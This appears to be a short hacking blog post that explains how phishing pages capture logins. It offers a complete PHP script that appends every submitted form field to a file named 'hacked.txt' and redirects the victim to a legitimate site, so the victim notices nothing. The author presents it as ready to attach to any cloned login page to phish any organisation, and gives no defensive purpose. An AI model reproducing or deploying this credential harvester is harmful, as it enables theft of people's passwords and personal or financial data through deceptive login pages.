Phishing is a technique used to steal sensitive and personal information by the medium of a fake webpage that exactly looks like a webpage of a reputed website or financial institution. I have deeply explained about Phishing in my previous post.
Have you ever thought how does the PHP script saves the login credentials to a text file and What is that script?, There is nothing special in this script it is just a simple PHP script that saves the information directly to a text file. This is one of the basic function of PHP that is generally used for gathering information through the medium of a form. The same is happening here, there is a certain action performed on pressing the login button that opens and executes the php script that we are using to save the login information to a text file.
Here I have bring PHP script for you that you can use for with any login page just by putting the php file name in the action attribute of the login button.
<?phpheader ('Location:http://www.ayushtyagi.com');$handle = fopen("hacked.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
Using this script you can make phishing page for any organisation and website. Hope you will like it...
0 comments:
Post a Comment